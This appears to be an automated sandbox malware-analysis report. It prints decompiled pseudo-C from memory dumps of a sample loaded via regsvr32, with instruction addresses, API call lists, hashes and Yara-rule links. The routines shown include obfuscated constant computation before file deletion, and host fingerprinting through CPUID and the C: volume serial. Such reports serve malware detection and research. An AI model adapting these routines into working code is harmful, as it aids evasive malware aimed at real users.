							_t265 = 0xb32f6ce;
							_t285 = 0x5c;
							L15:
							__eflags = _t315 - 0x88b21bc;
						} while (__eflags != 0);
						goto L18;
					}
				}
			}

















































                                                                                                                0x001ac4e5
                                                                                                                0x001ac4e8
                                                                                                                0x001ac4f2
                                                                                                                0x001ac4f8
                                                                                                                0x001ac500
                                                                                                                0x001ac50c
                                                                                                                0x001ac510
                                                                                                                0x001ac51b
                                                                                                                0x001ac520
                                                                                                                0x001ac52a
                                                                                                                0x001ac52f
                                                                                                                0x001ac535
                                                                                                                0x001ac53d
                                                                                                                0x001ac545
                                                                                                                0x001ac54d
                                                                                                                0x001ac555
                                                                                                                0x001ac55d
                                                                                                                0x001ac565
                                                                                                                0x001ac56d
                                                                                                                0x001ac575
                                                                                                                0x001ac57a
                                                                                                                0x001ac582
                                                                                                                0x001ac58a
                                                                                                                0x001ac596
                                                                                                                0x001ac59b
                                                                                                                0x001ac5a1
                                                                                                                0x001ac5a9
                                                                                                                0x001ac5b1
                                                                                                                0x001ac5b9
                                                                                                                0x001ac5c6
                                                                                                                0x001ac5c7
                                                                                                                0x001ac5cb
                                                                                                                0x001ac5d0
                                                                                                                0x001ac5d8
                                                                                                                0x001ac5e0
                                                                                                                0x001ac5e8
                                                                                                                0x001ac5f0
                                                                                                                0x001ac5f8
                                                                                                                0x001ac601
                                                                                                                0x001ac605
                                                                                                                0x001ac60d
                                                                                                                0x001ac615
                                                                                                                0x001ac623
                                                                                                                0x001ac627
                                                                                                                0x001ac62f
                                                                                                                0x001ac637
                                                                                                                0x001ac63f
                                                                                                                0x001ac647
                                                                                                                0x001ac64c
                                                                                                                0x001ac654
                                                                                                                0x001ac65c
                                                                                                                0x001ac669
                                                                                                                0x001ac66d
                                                                                                                0x001ac675
                                                                                                                0x001ac67d
                                                                                                                0x001ac685
                                                                                                                0x001ac68d
                                                                                                                0x001ac695
                                                                                                                0x001ac69a
                                                                                                                0x001ac6a4
                                                                                                                0x001ac6b1
                                                                                                                0x001ac6bf
                                                                                                                0x001ac6c4
                                                                                                                0x001ac6ca
                                                                                                                0x001ac6cf
                                                                                                                0x001ac6d7
                                                                                                                0x001ac6e4
                                                                                                                0x001ac6e7
                                                                                                                0x001ac6eb
                                                                                                                0x001ac6f7
                                                                                                                0x001ac6fb
                                                                                                                0x001ac703
                                                                                                                0x001ac70b
                                                                                                                0x001ac710
                                                                                                                0x001ac718
                                                                                                                0x001ac720
                                                                                                                0x001ac72c
                                                                                                                0x001ac731
                                                                                                                0x001ac737
                                                                                                                0x001ac73f
                                                                                                                0x001ac747
                                                                                                                0x001ac74f
                                                                                                                0x001ac757
                                                                                                                0x001ac75c
                                                                                                                0x001ac761
                                                                                                                0x001ac769
                                                                                                                0x001ac775
                                                                                                                0x001ac778
                                                                                                                0x001ac77c
                                                                                                                0x001ac780
                                                                                                                0x001ac788
                                                                                                                0x001ac790
                                                                                                                0x001ac798
                                                                                                                0x001ac7a0
                                                                                                                0x001ac7a8
                                                                                                                0x001ac7b0
                                                                                                                0x001ac7b4
                                                                                                                0x001ac7bc
                                                                                                                0x001ac7c4
                                                                                                                0x001ac7c9
                                                                                                                0x001ac7ce
                                                                                                                0x001ac7d6
                                                                                                                0x001ac7e3
                                                                                                                0x001ac7e7
                                                                                                                0x001ac7ef
                                                                                                                0x001ac7f7
                                                                                                                0x001ac7fc
                                                                                                                0x001ac804
                                                                                                                0x001ac80c
                                                                                                                0x001ac814
                                                                                                                0x001ac81c
                                                                                                                0x001ac824
                                                                                                                0x001ac82c
                                                                                                                0x001ac834
                                                                                                                0x001ac83c
                                                                                                                0x001ac83c
                                                                                                                0x001ac83e
                                                                                                                0x001ac83f
                                                                                                                0x001ac83f
                                                                                                                0x001ac844
                                                                                                                0x00000000
                                                                                                                0x001ac844
                                                                                                                0x001ac84e
                                                                                                                0x001ac8a3
                                                                                                                0x001ac8a9
                                                                                                                0x001ac8b4
                                                                                                                0x001ac8b4
                                                                                                                0x001ac8b7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001ac8b1
                                                                                                                0x001ac8b1
                                                                                                                0x001ac8b1
                                                                                                                0x001ac8b9
                                                                                                                0x001ac8bc
                                                                                                                0x001ac83f
                                                                                                                0x00000000
                                                                                                                0x001ac850
                                                                                                                0x001ac856
                                                                                                                0x001ac977
                                                                                                                0x001ac85c
                                                                                                                0x001ac862
                                                                                                                0x001ac89c
                                                                                                                0x00000000
                                                                                                                0x001ac864
                                                                                                                0x001ac866
                                                                                                                0x00000000
                                                                                                                0x001ac86c
                                                                                                                0x001ac882
                                                                                                                0x001ac889
                                                                                                                0x001ac88e
                                                                                                                0x001ac896
                                                                                                                0x00000000
                                                                                                                0x001ac896
                                                                                                                0x001ac866
                                                                                                                0x001ac862
                                                                                                                0x001ac856
                                                                                                                0x001ac97e
                                                                                                                0x001ac989
                                                                                                                0x001ac989
                                                                                                                0x001ac8c3
                                                                                                                0x001ac8c7
                                                                                                                0x001ac8cc
                                                                                                                0x001ac8d4
                                                                                                                0x001ac926
                                                                                                                0x001ac946
                                                                                                                0x001ac949
                                                                                                                0x001ac94e
                                                                                                                0x001ac951
                                                                                                                0x001ac958
                                                                                                                0x001ac959
                                                                                                                0x001ac959
                                                                                                                0x001ac959
                                                                                                                0x00000000
                                                                                                                0x001ac965
                                                                                                                0x001ac83f

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: }'$W6$\A{$}u$W|
                                                                                                                • API String ID: 0-1907099679
                                                                                                                • Opcode ID: e5a57107a2f09d8e72456048437c800bbadfe2dcb2d96cfd57b9f654c9a0caa0
                                                                                                                • Instruction ID: 89a9a2e4878dfb8e00d224e99bbb5c1b5b9b90aad3b24881d3fca34f262c325d
                                                                                                                • Opcode Fuzzy Hash: e5a57107a2f09d8e72456048437c800bbadfe2dcb2d96cfd57b9f654c9a0caa0
                                                                                                                • Instruction Fuzzy Hash: 7AC11EB66083809FD358CF65C88A50BFBF2FBD5798F20891DF1A586260D7B58949CF42
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B6998 Relevance: 6.4, Strings: 5, Instructions: 172COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E001B6998(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				char _v624;
				void* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t216;
				signed int _t217;
				intOrPtr _t218;

				_v92 = _v92 & 0x00000000;
				_v104 = 0x40c67f;
				_v100 = 0x3e54db;
				_v96 = 0xb32203;
				_v20 = 0x574ba2;
				_v20 = _v20 | 0x35973b8a;
				_v20 = _v20 + 0xffff32d7;
				_v20 = _v20 >> 6;
				_v20 = _v20 ^ 0x00d1d2c7;
				_v44 = 0xa28c;
				_v44 = _v44 + 0xffffc1d2;
				_v44 = _v44 + 0xffff5d52;
				_v44 = _v44 ^ 0xfff742c8;
				_v12 = 0x374331;
				_v12 = _v12 + 0x3a39;
				_v12 = _v12 | 0xe682e43f;
				_v12 = _v12 + 0x9525;
				_v12 = _v12 ^ 0xe6b0dfa1;
				_v16 = 0x7dac65;
				_t214 = 0x1c;
				_v16 = _v16 * 0x56;
				_v16 = _v16 + 0xb3ad;
				_v16 = _v16 + 0xffff8d20;
				_v16 = _v16 ^ 0x2a31d0e2;
				_v84 = 0x674ce;
				_v84 = _v84 >> 6;
				_v84 = _v84 ^ 0x00002de4;
				_v64 = 0xaa2744;
				_v64 = _v64 + 0xffff19cf;
				_v64 = _v64 ^ 0x00a461c3;
				_v8 = 0x53ad32;
				_v8 = _v8 | 0x03ce696d;
				_v8 = _v8 >> 5;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x00074f88;
				_v56 = 0x7df6e2;
				_v56 = _v56 | 0x123fa6ce;
				_v56 = _v56 * 0x49;
				_v56 = _v56 ^ 0x467b80f8;
				_v40 = 0x561f3f;
				_v40 = _v40 + 0xffff951d;
				_v40 = _v40 >> 2;
				_v40 = _v40 ^ 0x001dff13;
				_v48 = 0x2a3047;
				_v48 = _v48 | 0xfb435b17;
				_v48 = _v48 * 0x31;
				_v48 = _v48 ^ 0x1f9d5b70;
				_v76 = 0x748ff2;
				_v76 = _v76 + 0xffff5c97;
				_v76 = _v76 ^ 0x00728883;
				_v28 = 0xa7acb4;
				_v28 = _v28 / _t214;
				_t215 = 0x15;
				_v28 = _v28 * 0x5e;
				_v28 = _v28 ^ 0x023c0c02;
				_v36 = 0xffef9e;
				_v36 = _v36 | 0x7279e6a3;
				_v36 = _v36 + 0xc817;
				_v36 = _v36 ^ 0x7307f371;
				_v88 = 0x7428a9;
				_v88 = _v88 + 0xffffe6d9;
				_v88 = _v88 ^ 0x007f0dce;
				_v32 = 0xbaf18f;
				_v32 = _v32 | 0xa06f54ab;
				_v32 = _v32 / _t215;
				_v32 = _v32 ^ 0x07a74daf;
				_v72 = 0x47564;
				_v72 = _v72 << 1;
				_v72 = _v72 ^ 0x00035d2c;
				_v52 = 0xe20680;
				_v52 = _v52 >> 0xb;
				_t216 = 0x51;
				_v52 = _v52 / _t216;
				_v52 = _v52 ^ 0x00050690;
				_v68 = 0x56feb1;
				_v68 = _v68 | 0x9e3441a5;
				_v68 = _v68 ^ 0x9e7f1965;
				_v24 = 0x4edc60;
				_v24 = _v24 + 0xffffe4ed;
				_t217 = 0x27;
				_v24 = _v24 / _t217;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x00274fe8;
				_v80 = 0xfb4675;
				_v80 = _v80 ^ 0x928383bd;
				_v80 = _v80 ^ 0x9272faf3;
				_v60 = 0x9867a3;
				_v60 = _v60 ^ 0x26fbf63a;
				_v60 = _v60 | 0xbd6007a6;
				_v60 = _v60 ^ 0xbf6c0bf9;
				_t218 =  *0x1c4c10; // 0x67d820
				_t168 = _t218 + 0x20c; // 0x75004c
				_t205 = E001ABEE4(_v16, _v84, E001A2263(_t168, _v20, _v44, _v12), _v64, _a4 + 0x2c, _v8);
				_t250 = _t205;
				if(_t205 != 0) {
					_push(_v76);
					_push(0x1a109c);
					_push(_v48);
					E001B8EB3( *((intOrPtr*)(_a8 + 0x10)), _t250, _v28, _v56, _v36,  &_v624, _v88, E001BF5D9(_v56, _v40, _t250), _v32);
					E001BF94B(_t208, _v72, _v52, _v68, _v24);
					E001A7BC6(_v80, _v60,  &_v624);
				}
				return 1;
			}



































                                                                                                                0x001b69a1
                                                                                                                0x001b69a7
                                                                                                                0x001b69ae
                                                                                                                0x001b69b5
                                                                                                                0x001b69bc
                                                                                                                0x001b69c3
                                                                                                                0x001b69ca
                                                                                                                0x001b69d1
                                                                                                                0x001b69d5
                                                                                                                0x001b69dc
                                                                                                                0x001b69e3
                                                                                                                0x001b69ea
                                                                                                                0x001b69f1
                                                                                                                0x001b69f8
                                                                                                                0x001b69ff
                                                                                                                0x001b6a06
                                                                                                                0x001b6a0d
                                                                                                                0x001b6a14
                                                                                                                0x001b6a1b
                                                                                                                0x001b6a29
                                                                                                                0x001b6a2c
                                                                                                                0x001b6a2f
                                                                                                                0x001b6a36
                                                                                                                0x001b6a3d
                                                                                                                0x001b6a44
                                                                                                                0x001b6a4b
                                                                                                                0x001b6a4f
                                                                                                                0x001b6a56
                                                                                                                0x001b6a5d
                                                                                                                0x001b6a64
                                                                                                                0x001b6a6b
                                                                                                                0x001b6a72
                                                                                                                0x001b6a79
                                                                                                                0x001b6a7d
                                                                                                                0x001b6a81
                                                                                                                0x001b6a88
                                                                                                                0x001b6a8f
                                                                                                                0x001b6a9a
                                                                                                                0x001b6a9d
                                                                                                                0x001b6aa4
                                                                                                                0x001b6aab
                                                                                                                0x001b6ab2
                                                                                                                0x001b6ab6
                                                                                                                0x001b6abd
                                                                                                                0x001b6ac4
                                                                                                                0x001b6acf
                                                                                                                0x001b6ad2
                                                                                                                0x001b6ad9
                                                                                                                0x001b6ae0
                                                                                                                0x001b6ae7
                                                                                                                0x001b6aee
                                                                                                                0x001b6afc
                                                                                                                0x001b6b03
                                                                                                                0x001b6b04
                                                                                                                0x001b6b07
                                                                                                                0x001b6b0e
                                                                                                                0x001b6b15
                                                                                                                0x001b6b1c
                                                                                                                0x001b6b23
                                                                                                                0x001b6b2a
                                                                                                                0x001b6b31
                                                                                                                0x001b6b38
                                                                                                                0x001b6b3f
                                                                                                                0x001b6b46
                                                                                                                0x001b6b52
                                                                                                                0x001b6b55
                                                                                                                0x001b6b5c
                                                                                                                0x001b6b63
                                                                                                                0x001b6b66
                                                                                                                0x001b6b6f
                                                                                                                0x001b6b76
                                                                                                                0x001b6b7f
                                                                                                                0x001b6b84
                                                                                                                0x001b6b89
                                                                                                                0x001b6b90
                                                                                                                0x001b6b97
                                                                                                                0x001b6b9e
                                                                                                                0x001b6ba5
                                                                                                                0x001b6bac
                                                                                                                0x001b6bb6
                                                                                                                0x001b6bb9
                                                                                                                0x001b6bbc
                                                                                                                0x001b6bc0
                                                                                                                0x001b6bc7
                                                                                                                0x001b6bce
                                                                                                                0x001b6bd5
                                                                                                                0x001b6bdc
                                                                                                                0x001b6be3
                                                                                                                0x001b6bea
                                                                                                                0x001b6bf1
                                                                                                                0x001b6bfe
                                                                                                                0x001b6c07
                                                                                                                0x001b6c26
                                                                                                                0x001b6c2e
                                                                                                                0x001b6c30
                                                                                                                0x001b6c33
                                                                                                                0x001b6c36
                                                                                                                0x001b6c3b
                                                                                                                0x001b6c6b
                                                                                                                0x001b6c7e
                                                                                                                0x001b6c90
                                                                                                                0x001b6c98
                                                                                                                0x001b6ca0

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: 1C7$9:$G0*$-$O'
                                                                                                                • API String ID: 4033686569-3620061630
                                                                                                                • Opcode ID: 472a0d76273302b368393f347fe82f24a42877942ca78ba4d53cf60ccd3f897b
                                                                                                                • Instruction ID: b7b7d74f709e53fcc0908d13359b3c65175ce04987298b803b3bd0ffa9bec5f9
                                                                                                                • Opcode Fuzzy Hash: 472a0d76273302b368393f347fe82f24a42877942ca78ba4d53cf60ccd3f897b
                                                                                                                • Instruction Fuzzy Hash: B091EF71D0130DEBCF58CFE5D98A8DEBBB2BB44318F208159E411BA260D7B50A5ACF94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1001A057 Relevance: 6.0, APIs: 4, Instructions: 41keyboardwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 91%
                                                                                                                			E1001A057(void* __ecx) {
				void* __ebx;
				void* __edi;
				signed int _t5;
				void* _t15;
				void* _t18;
				void* _t19;

				_t15 = __ecx;
				if((E1001D23C(__ecx) & 0x40000000) != 0) {
					L6:
					_t5 = E10019B72(_t15, _t15, _t18, __eflags);
					asm("sbb eax, eax");
					return  ~( ~_t5);
				}
				_t19 = E10004700();
				if(_t19 == 0) {
					goto L6;
				}
				_t18 = GetKeyState;
				if(GetKeyState(0x10) < 0 || GetKeyState(0x11) < 0 || GetKeyState(0x12) < 0) {
					goto L6;
				} else {
					SendMessageA( *(_t19 + 0x20), 0x111, 0xe146, 0);
					return 1;
				}
			}









                                                                                                                0x1001a05a
                                                                                                                0x1001a066
                                                                                                                0x1001a0ae
                                                                                                                0x1001a0b0
                                                                                                                0x1001a0b7
                                                                                                                0x00000000
                                                                                                                0x1001a0b9
                                                                                                                0x1001a06d
                                                                                                                0x1001a071
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001a073
                                                                                                                0x1001a080
                                                                                                                0x00000000
                                                                                                                0x1001a094
                                                                                                                0x1001a0a3
                                                                                                                0x00000000
                                                                                                                0x1001a0ab

                                                                                                                APIs
                                                                                                                  • Part of subcall function 1001D23C: GetWindowLongA.USER32(?,000000F0), ref: 1001D247
                                                                                                                • GetKeyState.USER32(00000010), ref: 1001A07B
                                                                                                                • GetKeyState.USER32(00000011), ref: 1001A084
                                                                                                                • GetKeyState.USER32(00000012), ref: 1001A08D
                                                                                                                • SendMessageA.USER32 ref: 1001A0A3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: State$LongMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1063413437-0
                                                                                                                • Opcode ID: 9b59dec9598ab01ff2adb46d1952c09e509c8ceae496ba36d9fab1bdc3203c98
                                                                                                                • Instruction ID: 52e411cb2b8fe51767d99304a7365cfce5836da778a9601f26abfa61a435c152
                                                                                                                • Opcode Fuzzy Hash: 9b59dec9598ab01ff2adb46d1952c09e509c8ceae496ba36d9fab1bdc3203c98
                                                                                                                • Instruction Fuzzy Hash: D6F0E9BA3C03AA26E621B2745C41F992195CF4ABD0F020534E642EF0D6C9F1CCC11270
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10012490 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 296COMMONCrypto
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E10012490(void* __edx, intOrPtr __esi, void* __ebp, signed int _a4) {
				DWORD* _v4;
				char _v8;
				char _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				char _v32;
				char _v148;
				char _v276;
				DWORD* _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				intOrPtr _v308;
				long _v312;
				intOrPtr _v320;
				void* __ebx;
				void* __edi;
				signed int _t89;
				signed int _t91;
				intOrPtr* _t94;
				intOrPtr* _t98;
				intOrPtr* _t102;
				char _t105;
				void* _t115;
				intOrPtr* _t118;
				intOrPtr* _t121;
				intOrPtr* _t126;
				intOrPtr* _t133;
				intOrPtr* _t134;
				signed int** _t138;
				signed int** _t140;
				signed int** _t142;
				signed int** _t144;
				intOrPtr* _t146;
				intOrPtr _t165;
				char _t175;
				signed int _t192;
				signed int _t198;
				intOrPtr _t219;
				long _t222;
				signed int _t226;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed int _t240;
				signed int _t246;
				intOrPtr _t247;
				intOrPtr _t248;
				void* _t249;
				void* _t250;
				signed int _t251;
				void* _t253;
				signed int _t254;
				intOrPtr* _t256;
				intOrPtr* _t258;
				intOrPtr* _t260;
				intOrPtr* _t263;
				intOrPtr* _t265;

				_t249 = __ebp;
				_t248 = __esi;
				_push(0xffffffff);
				_push(E100522DF);
				_push( *[fs:0x0]);
				_t251 = _t250 - 0x12c;
				_t89 =  *0x1006dbdc; // 0xdf7c0cda
				_v16 = _t89 ^ _t251;
				_t91 =  *0x1006dbdc; // 0xdf7c0cda
				_push(_t91 ^ _t251);
				 *[fs:0x0] =  &_v12;
				_t246 = _a4;
				_v4 = 0;
				_v276 = _t246;
				_v280 = 0;
				_t94 = E100173A6();
				_t256 = _t94;
				_t167 = 0 | _t256 == 0x00000000;
				if(_t256 == 0) {
					_t94 = E10001000(_t167, __edx, 0x80004005);
				}
				_t217 =  *_t94;
				_v284 =  *((intOrPtr*)( *((intOrPtr*)( *_t94 + 0xc))))() + 0x10;
				_v4 = 1;
				_t98 = E100173A6();
				_t258 = _t98;
				_t170 = 0 | _t258 == 0x00000000;
				if(_t258 == 0) {
					_t98 = E10001000(_t170, _t217, 0x80004005);
				}
				_t218 =  *_t98;
				_v296 =  *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0xc))))() + 0x10;
				_v4 = 2;
				_t102 = E100173A6();
				_t260 = _t102;
				_t173 = 0 | _t260 == 0x00000000;
				if(_t260 == 0) {
					_t102 = E10001000(_t173, _t218, 0x80004005);
				}
				_t219 =  *_t102;
				_t105 =  *((intOrPtr*)( *((intOrPtr*)(_t219 + 0xc))))() + 0x10;
				_v288 = _t105;
				_v4 = 3;
				_push(_t105);
				_push(_t219);
				asm("cpuid");
				_v312 = 0;
				_v304 = 1;
				_t175 = _v304;
				_t222 = _v312;
				_push(_t175);
				_push(E10003500( &_v296, "%08X%08X", _t222));
				_push(_t175);
				_push(_t222);
				asm("cpuid");
				_v312 = 0;
				_v304 = 0;
				_push(_v304);
				E10003500( &_v288, "%08X%08X", _v312);
				_t226 =  &_v296;
				_t115 = E100020B0(_t249,  &_v300, _t226,  &_v288);
				_t253 = _t251 + 0x2c;
				_push(_t115);
				_v4 = 4;
				E10001FF0( &_v284);
				_t118 = _v304 + 0xfffffff0;
				_v8 = 3;
				asm("lock xadd [ecx], edx");
				if((_t226 | 0xffffffff) - 1 <= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t118)) + 4))))(_t118);
				}
				GetVolumeInformationA("c:\\",  &_v148, 0x80,  &_v312, 0, 0,  &_v276, 0x80);
				_t121 = E100173A6();
				_t263 = _t121;
				_t184 = 0 | _t263 == 0x00000000;
				if(_t263 == 0) {
					_t121 = E10001000(_t184,  &_v312, 0x80004005);
				}
				_v304 =  *((intOrPtr*)( *((intOrPtr*)( *_t121 + 0xc))))() + 0x10;
				_v8 = 5;
				E10003500( &_v304, 0x10058714, _v312);
				_t254 = _t253 + 0xc;
				_t126 = E100173A6();
				_t265 = _t126;
				_t188 = 0 | _t265 == 0x00000000;
				if(_t265 == 0) {
					_t126 = E10001000(_t188,  &_v304, 0x80004005);
				}
				 *_t246 =  *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0xc))))() + 0x10;
				_v284 = 1;
				_push(E10012130( &_v296, 0xd, 5));
				_t192 = _t246;
				_v20 = 6;
				E10001FF0(_t192);
				_t133 = _v312 + 0xfffffff0;
				_v24 = 5;
				asm("lock xadd [edx], ecx");
				if((_t192 | 0xffffffff) - 1 <= 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t133)) + 4))))(_t133);
				}
				_t134 = E10012130( &_v300, 3, 5);
				_t198 = _t246;
				_v24 = 7;
				E10003480(5, _t198, _t246, _t248, _t249,  *_t134,  *((intOrPtr*)( *_t134 - 0xc)));
				_t138 = _v320 + 0xfffffff0;
				_v32 = 5;
				_t234 =  &(_t138[3]);
				asm("lock xadd [edx], ecx");
				if((_t198 | 0xffffffff) - 1 <= 0) {
					_t234 =  *( *_t138);
					 *((intOrPtr*)( *((intOrPtr*)(_t234 + 4))))(_t138);
				}
				_t140 = _v308 + 0xfffffff0;
				_v12 = 3;
				asm("lock xadd [ecx], edx");
				_t236 = (_t234 | 0xffffffff) - 1;
				if(_t236 <= 0) {
					_t236 =  *( *_t140);
					 *((intOrPtr*)( *((intOrPtr*)(_t236 + 4))))(_t140);
				}
				_t142 = _v296 + 0xfffffff0;
				_v12 = 2;
				asm("lock xadd [ecx], edx");
				_t238 = (_t236 | 0xffffffff) - 1;
				if(_t238 <= 0) {
					_t238 =  *( *_t142);
					 *((intOrPtr*)( *((intOrPtr*)(_t238 + 4))))(_t142);
				}
				_t144 = _v304 + 0xfffffff0;
				_v12 = 1;
				asm("lock xadd [ecx], edx");
				_t240 = (_t238 | 0xffffffff) - 1;
				if(_t240 <= 0) {
					_t240 =  *( *_t144);
					 *((intOrPtr*)( *((intOrPtr*)(_t240 + 4))))(_t144);
				}
				_t146 = _v292 + 0xfffffff0;
				_v12 = 0;
				asm("lock xadd [ecx], edx");
				_t242 = (_t240 | 0xffffffff) - 1;
				if((_t240 | 0xffffffff) - 1 <= 0) {
					_t242 =  *((intOrPtr*)( *_t146));
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t146)) + 4))))(_t146);
				}
				 *[fs:0x0] = _v20;
				_pop(_t247);
				_pop(_t165);
				return E1003B437(_t246, _t165, _v24 ^ _t254, _t242, _t247, _t248);
			}

































































                                                                                                                0x10012490
                                                                                                                0x10012490
                                                                                                                0x10012490
                                                                                                                0x10012492
                                                                                                                0x1001249d
                                                                                                                0x1001249e
                                                                                                                0x100124a4
                                                                                                                0x100124ab
                                                                                                                0x100124b4
                                                                                                                0x100124bb
                                                                                                                0x100124c3
                                                                                                                0x100124c9
                                                                                                                0x100124d0
                                                                                                                0x100124db
                                                                                                                0x100124df
                                                                                                                0x100124e7
                                                                                                                0x100124ee
                                                                                                                0x100124f0
                                                                                                                0x100124f5
                                                                                                                0x100124fc
                                                                                                                0x100124fc
                                                                                                                0x10012501
                                                                                                                0x1001250d
                                                                                                                0x10012511
                                                                                                                0x1001251c
                                                                                                                0x10012523
                                                                                                                0x10012525
                                                                                                                0x1001252a
                                                                                                                0x10012531
                                                                                                                0x10012531
                                                                                                                0x10012536
                                                                                                                0x10012542
                                                                                                                0x10012546
                                                                                                                0x1001254e
                                                                                                                0x10012555
                                                                                                                0x10012557
                                                                                                                0x1001255c
                                                                                                                0x10012563
                                                                                                                0x10012563
                                                                                                                0x10012568
                                                                                                                0x10012571
                                                                                                                0x10012574
                                                                                                                0x10012578
                                                                                                                0x10012580
                                                                                                                0x10012581
                                                                                                                0x10012589
                                                                                                                0x1001258b
                                                                                                                0x1001258f
                                                                                                                0x10012595
                                                                                                                0x10012599
                                                                                                                0x1001259d
                                                                                                                0x100125b1
                                                                                                                0x100125b2
                                                                                                                0x100125b3
                                                                                                                0x100125bd
                                                                                                                0x100125bf
                                                                                                                0x100125c3
                                                                                                                0x100125d2
                                                                                                                0x100125de
                                                                                                                0x100125e8
                                                                                                                0x100125f2
                                                                                                                0x100125f7
                                                                                                                0x100125fa
                                                                                                                0x100125ff
                                                                                                                0x10012607
                                                                                                                0x10012610
                                                                                                                0x10012613
                                                                                                                0x10012621
                                                                                                                0x10012628
                                                                                                                0x10012632
                                                                                                                0x10012632
                                                                                                                0x10012659
                                                                                                                0x1001265f
                                                                                                                0x10012666
                                                                                                                0x10012668
                                                                                                                0x1001266d
                                                                                                                0x10012674
                                                                                                                0x10012674
                                                                                                                0x10012685
                                                                                                                0x1001269d
                                                                                                                0x100126a4
                                                                                                                0x100126a9
                                                                                                                0x100126ac
                                                                                                                0x100126b3
                                                                                                                0x100126b5
                                                                                                                0x100126ba
                                                                                                                0x100126c1
                                                                                                                0x100126c1
                                                                                                                0x100126d2
                                                                                                                0x100126e0
                                                                                                                0x100126ed
                                                                                                                0x100126ee
                                                                                                                0x100126f0
                                                                                                                0x100126f8
                                                                                                                0x10012701
                                                                                                                0x10012704
                                                                                                                0x10012711
                                                                                                                0x10012718
                                                                                                                0x10012722
                                                                                                                0x10012722
                                                                                                                0x10012730
                                                                                                                0x1001273c
                                                                                                                0x1001273e
                                                                                                                0x10012746
                                                                                                                0x1001274f
                                                                                                                0x10012752
                                                                                                                0x10012759
                                                                                                                0x1001275f
                                                                                                                0x10012766
                                                                                                                0x1001276a
                                                                                                                0x10012770
                                                                                                                0x10012770
                                                                                                                0x10012776
                                                                                                                0x10012779
                                                                                                                0x10012787
                                                                                                                0x1001278b
                                                                                                                0x1001278e
                                                                                                                0x10012792
                                                                                                                0x10012798
                                                                                                                0x10012798
                                                                                                                0x1001279e
                                                                                                                0x100127a1
                                                                                                                0x100127af
                                                                                                                0x100127b3
                                                                                                                0x100127b6
                                                                                                                0x100127ba
                                                                                                                0x100127c0
                                                                                                                0x100127c0
                                                                                                                0x100127c6
                                                                                                                0x100127c9
                                                                                                                0x100127d7
                                                                                                                0x100127db
                                                                                                                0x100127de
                                                                                                                0x100127e2
                                                                                                                0x100127e8
                                                                                                                0x100127e8
                                                                                                                0x100127ee
                                                                                                                0x100127f1
                                                                                                                0x100127ff
                                                                                                                0x10012803
                                                                                                                0x10012806
                                                                                                                0x1001280a
